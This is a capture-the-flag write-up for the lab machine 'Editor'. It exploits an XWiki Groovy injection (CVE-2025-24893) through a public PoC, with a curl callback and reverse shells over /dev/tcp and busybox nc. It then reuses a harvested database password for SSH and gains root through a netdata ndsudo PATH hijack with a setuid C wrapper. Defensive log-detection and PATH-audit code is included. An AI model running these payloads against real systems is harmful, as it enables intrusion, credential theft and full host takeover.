
Editor

Recon

# Nmap 7.93 scan initiated Mon Oct 20 20:48:57 2025 as: nmap -sVC -oA initial_scan -p22,80,8080 10.10.11.80
# Nmap scan report for 10.10.11.80
# Host is up (0.032s latency).

# PORT     STATE SERVICE VERSION
# 22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey:
# |   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
# |_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
# 80/tcp   open  http    nginx 1.18.0 (Ubuntu)
# |_http-server-header: nginx/1.18.0 (Ubuntu)
# |_http-title: Did not follow redirect to http://editor.htb/
# 8080/tcp open  http    Jetty 10.0.20
# | http-methods:
# |_  Potentially risky methods: PROPFIND LOCK UNLOCK
# |_http-server-header: Jetty(10.0.20)
# | http-webdav-scan:
# |   WebDAV type: Unknown
# |   Server Type: Jetty(10.0.20)
# |_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
# | http-title: XWiki - Main - Intro
# |_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
# | http-cookie-flags:
# |   /:
# |     JSESSIONID:
# |_      httponly flag not set
# |_http-open-proxy: Proxy might be redirecting requests
# | http-robots.txt: 50 disallowed entries (15 shown)
# | /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
# | /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
# | /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
# | /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
# | /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
# |_/xwiki/bin/undelete/
# Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 20 20:49:06 2025 -- 1 IP address (1 host up) scanned in 8.32 seconds

User

After looking through tcp/80 we see that this company provides a code IDE; it seems to be developed with some Python (e.g. tkinter).

Looking through the site we find a link to their wiki, which redirects us to tcp/8080, though we first need to add wiki.editor.htb to our /etc/hosts file.

Now we have access to an XWiki site that explains some basics about their IDE.

If we look at the bottom we find the version: XWiki Debian 15.10.8.

Looking through CVE Details we find CVE-2025-24893, an unauthenticated RCE within the SolrSearch feature (fixed in version 15.10.11).

They provide a PoC inline, but the special characters are a bit hard to handle within the browser or via Burp. It's very interesting: essentially it uses the search feature, which is vulnerable to Groovy injection (Groovy is based on Java), and from there we can run system commands to get RCE. While I don't really understand why it's necessary, we need the server to reply as an RSS feed using ?media=rss.
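From the defender's side, the request shape described above is easy to spot in web server logs. The following is an added example (not part of the writeup or of XWiki) that parses combined-format access log lines and flags SolrSearch requests whose text parameter carries wiki macro syntax; the sample log lines are constructed, and the macro list is my assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines in combined format (not taken from the box):
# one SolrSearch request carrying macro syntax in `text`, one benign search, one page view.
SAMPLE_LOG = """\
10.10.14.181 - - [21/Oct/2025:21:46:27 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22id%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D HTTP/1.1" 200 812
10.10.14.5 - - [21/Oct/2025:21:47:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=installation+guide HTTP/1.1" 200 2310
10.10.14.5 - - [21/Oct/2025:21:47:30 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# XWiki 2.x macro openers/closers that have no business inside a search string (assumed list).
MACRO_RE = re.compile(r"\{\{/?(groovy|async|velocity|python|script)\b", re.IGNORECASE)

def classify(line):
    """Return a finding for a SolrSearch request whose `text` carries macro syntax, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    if not url.path.endswith("/SolrSearch"):
        return None
    params = parse_qs(url.query)
    # parse_qs already decodes once; decode again so a double-encoded payload is not missed.
    text = unquote(" ".join(params.get("text", [])))
    macros = sorted({hit.lower() for hit in MACRO_RE.findall(text)})
    if not macros:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "macros": macros,
        "breaks_out": text.lstrip().startswith("}}"),  # payload opens with a macro terminator
        "rss": params.get("media") == ["rss"],
    }

def scan(log_text):
    """Findings for every line of an access log."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```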

Let's try to find a script PoC instead. Searching GitHub we find this repo; let's test it first:

python3 POC-CVE-2025-24893.py -t http://wiki.editor.htb/ -c 'curl -s http://10.10.14.181/test'
# [*] Attacking http://wiki.editor.htb/
# [*] Injecting the payload:
# http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22curl%20-s%20http%3A//10.10.14.181/test%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
# [*] Command executed
#
# ~Happy Hacking

python3 -m http.server 80
# Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
# 10.10.11.80 - - [21/Oct/2025 21:46:27] code 404, message File not found
# 10.10.11.80 - - [21/Oct/2025 21:46:27] "GET /test HTTP/1.1" 404 -
# 10.10.11.80 - - [21/Oct/2025 21:46:27] code 404, message File not found
# 10.10.11.80 - - [21/Oct/2025 21:46:27] "GET /test HTTP/1.1" 404 -

Great, let's try to get a reverse shell now:

nc -lnvp 443

python3 POC-CVE-2025-24893.py -t http://wiki.editor.htb/ -c 'sh -i >& /dev/tcp/10.10.14.181/443 0>&1'

This doesn't work… I then tried some data exfiltration instead, passing ls through TCP or even HTTP using curl, but nothing works. This is weird: it is a Linux machine but the commands don't seem to work. (Groovy's String.execute() hands the tokenized string straight to Runtime.exec(), so there is no shell around to interpret redirections such as >&.) I also tried directly running a Groovy reverse shell via Burp using the method from the PoC, but no luck.

After thinking a bit and looking at other options, I tried the busybox reverse shell:

python3 POC-CVE-2025-24893.py -t http://wiki.editor.htb/ -c 'busybox nc 10.10.14.181 443 -e sh'
# [*] Attacking http://wiki.editor.htb/
# [*] Injecting the payload:
# http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.14.181%20443%20-e%20sh%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
# [*] Command executed
#
# ~Happy Hacking

nc -lnvp 443
# Ncat: Connection from 10.10.11.80.
# Ncat: Connection from 10.10.11.80:47270.
whoami
# xwiki
id
# uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
uname -a
# Linux editor 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 GNU/Linux
cat /etc/os-release
# PRETTY_NAME="Ubuntu 22.04.5 LTS"
busybox --help
# BusyBox v1.30.1
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
# oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
ls /home/oliver
# Permission denied
pwd
# /var/lib/xwiki
ls
# data tmp
ls -l data
# drwxr-xr-x 4 xwiki xwiki 4096 Jun 13 17:09 cache
# -rw-r--r-- 1 xwiki xwiki  450 Jun 13 17:10 configuration.properties
# drwxr-xr-x 4 xwiki xwiki 4096 Jun 13 17:12 extension
# drwxr-xr-x 3 xwiki xwiki 4096 Jun 13 17:09 jobs
# drwxr-xr-x 2 xwiki xwiki 4096 Jun 13 17:08 logs
# drwxr-xr-x 2 xwiki xwiki 4096 Jun 13 17:09 observation
# drwxr-xr-x 4 xwiki xwiki 4096 Jun 13 17:13 store
cat data/configuration.properties
# xwiki.authentication.validationKey = \uBF48\u0EE2\u03FE\u4B0F\u3C8E\u35DA\uEEB8\u4013\u1E90\uF9A7\u4040\u28EA\uD217\u288BF\u6AF7\u377E\u295C\uC98D\u17FB5\uD3D4\u967F\uB8DE\u955B\uD54B\uEE55\u890D\uAFFC\u993B\u1C49\u9B87
# xwiki.authentication.encryptionKey = \uC327\u7B18\u1FFE\u913D\uEDBD\u6C85\uE778\uD7C6\u91D0\uA56F\uE1CB\u014B\uD03E\u9E5D\uED9D\uB44A\u3A0C\u1C76\uF0D6\u8289\u645F\u6EB8\u00EB\u99DA\u589E\uE3CE\uC24A\u9486\u5EAB\u2E85\uCCEB\uAF4D

I saw /usr/lib/xwiki mentioned somewhere, I don't remember where:

cd /usr/lib/xwiki
ls
# META-INF  redirect  resources  skins  templates  WEB-INF
cd WEB-INF
grep -r "password"
# hibernate.cfg.xml:    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
# hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml:    <property name="hibernate.connection.password"></property>
# hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml:    <property name="hibernate.connection.password"></property>

Great, looking at the file we find:

<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>

xwiki:theEd1t0rTeam99

Let's try that password on oliver:

ssh oliver@editor.htb
# Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
ls
# user.txt

Root

sudo -l
# [sudo] password for oliver:
# Sorry, user oliver may not run sudo on editor.
cd /opt
ls
# containerd netdata
cd netdata
ls -la
# drwxr-xr-x 8 root    root    4096 Jul  8 08:34 .
# drwxr-xr-x 4 root    root    4096 Jul  8 08:34 ..
# drwxr-xr-x 3 root    root    4096 Jul  8 08:34 bin
# drwxr-xr-x 3 root    root    4096 Jul  8 08:34 etc
# lrwxrwxrwx 1 root    root      11 Jun 15 16:33 netdata-configs -> etc/netdata
# lrwxrwxrwx 1 root    root      15 Jun 15 16:33 netdata-dbs -> var/lib/netdata
# lrwxrwxrwx 1 root    root      15 Jun 15 16:33 netdata-logs -> var/log/netdata
# lrwxrwxrwx 1 root    root      17 Jun 15 16:33 netdata-metrics -> var/cache/netdata
# lrwxrwxrwx 1 root    root      19 Jun 15 16:33 netdata-plugins -> usr/libexec/netdata
# lrwxrwxrwx 1 root    root      21 Jun 15 16:33 netdata-web-files -> usr/share/netdata/web
# lrwxrwxrwx 1 root    root       3 Jun 15 16:33 sbin -> bin
# drwxr-xr-x 6 root    root    4096 Jul  8 08:34 share
# drwxr-xr-x 2 root    root    4096 Jul  8 08:34 system
# drwxr-xr-x 5 root    root    4096 Jul  8 08:34 usr
# drwxr-xr-x 6 netdata netdata 4096 Jul  8 08:34 var

Searching online, I found out that netdata is a monitoring tool. Looking at the open ports we see there is a service running on 8079:

ss -tulnp
# tcp    LISTEN  0       128                    [::]:22                [::]:*
# tcp    LISTEN  0       511                    [::]:80                [::]:*
# tcp    LISTEN  0       50       [::ffff:127.0.0.1]:8079                 *:*      users:(("java",pid=986,fd=41))
# tcp    LISTEN  0       50                        *:8080                 *:*      users:(("java",pid=986,fd=43))

Let's look through the bin/ and sbin/ directories first:

./bin/netdata -V
# netdata v1.45.2

Looking for vulnerabilities I found CVE-2024-32019, which allows running commands as root via the ndsudo utility.

Let's find it:

find . -type f -name ndsudo
# ./usr/libexec/netdata/plugins.d/ndsudo
ls -la ./usr/libexec/netdata/plugins.d/ndsudo
# -rwsr-x--- 1 root netdata 200576 Apr  1  2024 ./usr/libexec/netdata/plugins.d/ndsudo
./usr/libexec/netdata/plugins.d/ndsudo -h
#
# ndsudo
#
# (C) Netdata Inc.
#
# A helper to allow Netdata run privileged commands.
#
#   --test
#     print the generated command that will be run, without running it.
#
#   --help
#     print this message.
#
# The following commands are supported:
#
# - Command    : nvme-list
#   Executables: nvme
#   Parameters : list --output-format=json
#
# - Command    : nvme-smart-log
#   Executables: nvme
#   Parameters : smart-log  --output-format=json
#
# - Command    : megacli-disk-info
#   Executables: megacli MegaCli
#   Parameters : -LDPDInfo -aAll -NoLog
#
# - Command    : megacli-battery-info
#   Executables: megacli MegaCli
#   Parameters : -AdpBbuCmd -aAll -NoLog
#
# - Command    : arcconf-ld-info
#   Executables: arcconf
#   Parameters : GETCONFIG 1 LD
#
# - Command    : arcconf-pd-info
#   Executables: arcconf
#   Parameters : GETCONFIG 1 PD
#
# The program searches for executables in the system path.
#
# Variables given as  are expected on the command line as:
#   --variable VALUE
#
# VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .

The program searches for executables in the system path.

OK, so essentially we can give it one of the preset commands and it will run it as root, and those preset commands locate their binary via the $PATH:

./usr/libexec/netdata/plugins.d/ndsudo nvme-list
# nvme : not available in PATH.
echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

There is no nvme binary, which makes this easier, as the helper trusts our own PATH. Let's put a custom nvme in a hidden tmp directory and prepend that directory to PATH:

cd /var/tmp
mkdir systemd-private-dcb5adc5ba2dc532dca332960fef89a9-xwiki.service-000fe2
cd systemd-private-dcb5adc5ba2dc532dca332960fef89a9-xwiki.service-000fe2
printf '#!/bin/bash\n/bin/bash\n' > nvme
chmod +x nvme
export PATH="$PWD:$PATH"

cd /opt/netdata
./usr/libexec/netdata/plugins.d/ndsudo nvme-list
whoami
# oliver
exit

Mmh, it did spawn a new shell, but that was not a privesc: bash resets its effective UID back to the real UID when the two differ, so the setuid context ndsudo gave us is dropped. Let's try a shell wrapper that forces the UID/GID to 0 first:

#include <unistd.h>
#include <stdlib.h>

/* ndsudo is setuid root, so we start with euid 0 but ruid oliver.
   Make both real and effective ids 0 before launching bash, so bash
   has nothing to drop. */
int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
gcc -o foo foo.c
python3 -m http.server 80
wget http://<myIP>/foo -O /var/tmp/systemd-private-dcb5adc5ba2dc532dca332960fef89a9-xwiki.service-000fe2/nvme
./usr/libexec/netdata/plugins.d/ndsudo nvme-list
whoami
# root
cd /root
ls
# root.txt scripts snap
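As an added example (not from the writeup or from netdata), here is a Python audit of the root cause exploited above: for each command ndsudo supports, it reports where the executable resolves under a given PATH and whether an untrusted, non-root-writable directory is consulted at or before that point. The trusted directory set and the injectable executable/unsafe_dir callbacks are my assumptions.

```python
import os
import stat

# ndsudo commands and the executable names it looks for, from the --help output above.
NDSUDO_EXECUTABLES = {
    "nvme-list": ["nvme"],
    "nvme-smart-log": ["nvme"],
    "megacli-disk-info": ["megacli", "MegaCli"],
    "megacli-battery-info": ["megacli", "MegaCli"],
    "arcconf-ld-info": ["arcconf"],
    "arcconf-pd-info": ["arcconf"],
}

# Assumption: our own allow-list of root-owned system directories, not a netdata setting.
TRUSTED_DIRS = {"/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"}

def is_executable(path):
    return os.path.isfile(path) and os.access(path, os.X_OK)

def writable_by_non_root(directory):
    """True if a non-root user could place a file here: not root-owned, or group/world writable."""
    try:
        st = os.stat(directory)
    except FileNotFoundError:
        return False
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def resolve(name, dirs, executable=is_executable):
    """First hit while walking dirs in order, the way execvp() walks PATH."""
    for d in dirs:
        candidate = os.path.join(d, name)
        if executable(candidate):
            return candidate
    return None

def audit(path_env, executable=is_executable, unsafe_dir=writable_by_non_root):
    """Per ndsudo command: resolved path under path_env, and whether a risky dir precedes or holds it."""
    dirs = path_env.split(":")
    risky = [d for d in dirs if d not in TRUSTED_DIRS and unsafe_dir(d)]
    report = {"untrusted_writable_dirs": risky, "commands": {}}
    for cmd, names in NDSUDO_EXECUTABLES.items():
        found = next((p for n in names if (p := resolve(n, dirs, executable))), None)
        # PATH position of the real binary; a missing binary means every risky dir wins.
        cutoff = dirs.index(os.path.dirname(found)) if found else len(dirs)
        hijackable = any(dirs.index(d) <= cutoff for d in risky)
        report["commands"][cmd] = {"path": found, "hijackable": hijackable}
    return report

if __name__ == "__main__":
    print(audit(os.environ.get("PATH", "")))
```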